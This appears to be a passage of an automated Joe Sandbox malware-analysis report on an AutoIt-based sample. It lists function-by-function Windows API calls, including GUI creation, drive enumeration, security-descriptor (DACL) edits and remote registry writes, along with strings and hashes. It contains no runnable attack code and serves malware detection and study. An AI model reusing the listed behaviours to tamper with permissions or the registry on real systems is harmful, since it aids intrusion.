                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: ed3daa6ec64db33a6611cfa24624bb07f46b0bd184d6bc692f5bc4c54e8505cc
                                                                                                                                                                                                                                                                                            • Instruction ID: f05c4f57cc8fa2cb1cf904ad0373c7294a1a74b297fcb9b44324554a0297ba29
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed3daa6ec64db33a6611cfa24624bb07f46b0bd184d6bc692f5bc4c54e8505cc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE12F2342002419FD725CF14C884BADB7F5FB46306F184129F9668B662C735EECAEB95
                                                                                                                                                                                                                                                                                            Function 00C9316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 00C9319B
                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C932C7
                                                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00C93306
                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00C93316
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00C9335D
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00C93369
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00C933B2
                                                                                                                                                                                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C933C1
                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00C933D1
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00C933D5
                                                                                                                                                                                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00C933E5
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C933EE
                                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00C933F7
                                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C93423
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C9343A
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00C9347A
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C9348E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C9349F
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00C934D4
                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00C934DF
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C934EA
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00C934F4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                            • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                            • Opcode ID: 7ae114c45c34c7d576d4259b852df2d1583634a0e5648d2183e8c680324b3ad1
                                                                                                                                                                                                                                                                                            • Instruction ID: a2a282fe8d42c8e3ac9a2b00c492e31fa082019c41c59482c7a213bad68a5ac7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ae114c45c34c7d576d4259b852df2d1583634a0e5648d2183e8c680324b3ad1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4BB15F71A40205AFEB14DFA8DC89FAF7BB9EB09714F004115FA16EB2A1D774AD40DB50
                                                                                                                                                                                                                                                                                            Function 00C85524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C85532
                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,00CADC30,?,\\.\,00CADCD0), ref: 00C8560F
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00CADC30,?,\\.\,00CADCD0), ref: 00C8577B
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                                            • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                                            • Opcode ID: b8c90877b3f879b91939f0273a0ead3204cd62a7b03578762dd8398d20ed5d62
                                                                                                                                                                                                                                                                                            • Instruction ID: d09ce5fc3372c65ae43edf1f6992a400eba7be945e00f5828c019f5bb6b89f9c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8c90877b3f879b91939f0273a0ead3204cd62a7b03578762dd8398d20ed5d62
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B610630608905DFC724FF24C9919BDB3B2EF05358BA48166F416AB391E7B1DE81EB45
                                                                                                                                                                                                                                                                                            Function 00CA1A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00CA1BC4
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00CA1BD9
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00CA1BE0
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CA1C35
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00CA1C55
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CA1C89
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CA1CA7
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CA1CB9
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 00CA1CCE
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00CA1CE1
                                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(00000000), ref: 00CA1D3D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00CA1D58
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00CA1D6C
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00CA1D84
                                                                                                                                                                                                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00CA1DAA
                                                                                                                                                                                                                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00CA1DC4
                                                                                                                                                                                                                                                                                            • CopyRect.USER32(?,?), ref: 00CA1DDB
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 00CA1E46
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                                            • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                                            • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                                            • Opcode ID: 66df3c4c23ffd35dd336729bdf944269d5a975dbac73aa5ae73e0edbe9a90456
                                                                                                                                                                                                                                                                                            • Instruction ID: 6c1acfb6e30a2a73f3bd4e29020dc4d77f0e7913b91bd2fdb87f72758d13ba01
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66df3c4c23ffd35dd336729bdf944269d5a975dbac73aa5ae73e0edbe9a90456
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BB17C71604302AFD714DF64C884B9EBBE5FF86318F048918F99A9B2A1C731D945DB92
                                                                                                                                                                                                                                                                                            Function 00CA0CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00CA0D81
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA0DBB
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA0E25
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA0E8D
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA0F11
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CA0F61
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CA0FA0
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C2FD52: _wcslen.LIBCMT ref: 00C2FD5D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C72B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C72BA5
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C72B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C72BD7
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                            • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                                            • Opcode ID: 9827c880b7943da663f8f032f6bf8390abf9cabed502361225abcc8efbbfd5bf
                                                                                                                                                                                                                                                                                            • Instruction ID: 3caba12ab6e0d7c182de6a110ff7d9ef81fef12406494ee456af556f6bf4c1dd
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9827c880b7943da663f8f032f6bf8390abf9cabed502361225abcc8efbbfd5bf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38E1F5312083428FC714DF24C99196AB3E2FF86358F14496DF8A69B3A1DB30EE45EB51
                                                                                                                                                                                                                                                                                            Function 00C12521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C125F8
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00C12600
                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C1262B
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00C12633
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00C12658
                                                                                                                                                                                                                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C12675
                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C12685
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C126B8
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C126CC
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00C126EA
                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00C12706
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C12711
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C119CD: GetCursorPos.USER32(?), ref: 00C119E1
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C119CD: ScreenToClient.USER32(00000000,?), ref: 00C119FE
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C119CD: GetAsyncKeyState.USER32(00000001), ref: 00C11A23
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C119CD: GetAsyncKeyState.USER32(00000002), ref: 00C11A3D
                                                                                                                                                                                                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,00C1199C), ref: 00C12738
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                            • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                                            • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                                            • Opcode ID: dc8c6066ba968fd26979abbce7814d9e3836f15adf9d3f1d98ad20ca509d6b66
                                                                                                                                                                                                                                                                                            • Instruction ID: d3dd73e914d46d3e6c89efd1d70f3411fd0e1527dc9e34ab99dc1cb8d8078f36
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc8c6066ba968fd26979abbce7814d9e3836f15adf9d3f1d98ad20ca509d6b66
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DB1BB75A002499FCB14DFA8CC85BEE7BB5FB49315F004229FA16AB2D0DB70E980DB54
                                                                                                                                                                                                                                                                                            Function 00C716D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C71A60
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A6C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A7B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A82
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C71A99
                                                                                                                                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C71741
                                                                                                                                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C71775
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00C7178C
                                                                                                                                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00C717C6
                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C717E2
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00C717F9
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C71801
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C71808
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C71829
                                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00C71830
                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C7185F
                                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C71881
                                                                                                                                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C71893
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C718BA
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C718C1
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C718CA
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C718D1
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C718DA
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C718E1
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C718ED
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C718F4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71ADF: GetProcessHeap.KERNEL32(00000008,00C714FD,?,00000000,?,00C714FD,?), ref: 00C71AED
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C714FD,?), ref: 00C71AF4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C714FD,?), ref: 00C71B03
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2a670156ea26b30dc142f8192de12e03b9de93f22a3b957be73c3a6454f15552
                                                                                                                                                                                                                                                                                            • Instruction ID: 56d5f6cd9c29fba19dc5dcb3fdb3c1becd6be37ed8bdba9a33582769dd916d4d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a670156ea26b30dc142f8192de12e03b9de93f22a3b957be73c3a6454f15552
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B57149B2D00209ABDF109FA9DC45FEEBBB8BF05314F198125F92AA7190D7319A05CB61
                                                                                                                                                                                                                                                                                            Function 00C9CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9CF1D
                                                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00CADCD0,00000000,?,00000000,?,?), ref: 00C9CFA4
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00C9D004
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C9D054
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C9D0CF
                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00C9D112
                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00C9D221
                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00C9D2AD
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C9D2E1
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C9D2EE
                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00C9D3C0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
